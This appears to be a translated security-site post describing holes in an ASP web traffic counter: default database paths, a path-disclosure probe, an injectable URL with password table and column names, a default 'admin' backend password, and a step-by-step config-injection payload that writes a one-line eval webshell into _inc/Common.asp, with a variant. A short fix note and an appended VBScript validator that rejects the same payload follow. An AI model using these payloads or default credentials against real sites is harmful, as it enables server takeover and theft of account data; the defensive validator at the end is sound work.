I. Default database
Counter/_db/db_CC_Counter6.mdb
It can also be opened directly: http://www.bkjia.com/Counter/utilities/update.asp
View the page source and look for <! to find the database address. This is a flaw in the program.
II. Path disclosure vulnerability
Use the probe http://www.bkjia.com/Counter/utilities/aspSysCheck.asp to view the website path.
III. Injection
A user injection exists. It can be used to guess a user's account and password. It cannot be used to get a SHELL; it is only useful for social engineering.
http://www.bkjia.com/xxcount/core/default.asp?id=xxcnc
The traffic statistics username is xxcnc, the table that stores passwords is t_Site, the username column is UID, the password column is PWD, and the login page is http://www.bkjia.com/xxcount/supervise/login.asp
IV. Inserting a shell from the admin backend
You need to get into the admin backend to insert a SHELL statement. However, the administrator password is admin, and it is stored not in the database but in _inc/Common.asp.
Specifically, enter the following as the management mailbox in the backend:
cnhacker@263.net":eval request(chr(35))//
Paste it in and click Save, then view the content of _inc/common.asp:
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"
Hey, now it gets executed. The backend of the statistics program escapes " to \", which is why eval request(chr(35)) is used. // is a comment, and the colon acts as a line break in ASP. The precondition is that you can get into the backend (many backend management passwords are admin). PHP can be handled the same way, and it has more such places than ASP! You need to make good use of the symbols before and after the configuration statement.
Another note: some people have mentioned a similar method for anti-DDoS. You can write it as 9 xiao"%><%eval request(chr(35))%><%', which is also clever. // and ' are comments in ASP!
By happy revenge
www.2cto.com provides the repair solution:
Change the default path and password. Enhance filtering and verification.
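
One way to apply "enhance filtering and verification" to the mailbox setting from section IV, as an added example that is not the counter program's own code. The function names are hypothetical; only WebMasterEmail and the value from section IV come from the page. It shows that VBScript escapes a quote by doubling it, not with a backslash, and that an allowlist rejects the value before anything is written to _inc/Common.asp.

```vbscript
Option Explicit

' Allowlist check (hypothetical helper): accept only a plain mailbox form.
' Quotes, colons, spaces, %, angle brackets and line breaks never match.
Function IsSafeEmail(ByVal s)
    Dim re
    IsSafeEmail = False
    If Len(s) = 0 Or Len(s) > 254 Then Exit Function
    If InStr(s, vbCr) > 0 Or InStr(s, vbLf) > 0 Then Exit Function
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$"
    IsSafeEmail = re.Test(s)
End Function

' VBScript escapes a double quote inside a string literal by doubling it.
' A backslash is an ordinary character, so \" still ends the literal,
' which is why the escaping described in section IV does not contain the value.
Function VbsStringLiteral(ByVal s)
    VbsStringLiteral = """" & Replace(s, """", """""") & """"
End Function

' Returns the config line to write, or "" when the value is rejected.
Function BuildEmailConfigLine(ByVal email)
    BuildEmailConfigLine = ""
    If Not IsSafeEmail(email) Then Exit Function
    BuildEmailConfigLine = "WebMasterEmail = " & VbsStringLiteral(email)
End Function

' Self-check on constructed inputs; raises an error if any check fails.
Sub SelfCheck()
    Dim hostile
    ' The mailbox value quoted in section IV of the page
    hostile = "cnhacker@263.net"":eval request(chr(35))//"
    If BuildEmailConfigLine(hostile) <> "" Then
        Err.Raise vbObjectError + 1, "SelfCheck", "hostile value accepted"
    End If
    If BuildEmailConfigLine("admin@example.com") <> _
       "WebMasterEmail = ""admin@example.com""" Then
        Err.Raise vbObjectError + 2, "SelfCheck", "valid value rejected"
    End If
    ' Defence in depth: doubling keeps a quote inside the literal
    If VbsStringLiteral("a""b") <> """a""""b""" Then
        Err.Raise vbObjectError + 3, "SelfCheck", "quote not doubled"
    End If
End Sub

SelfCheck
```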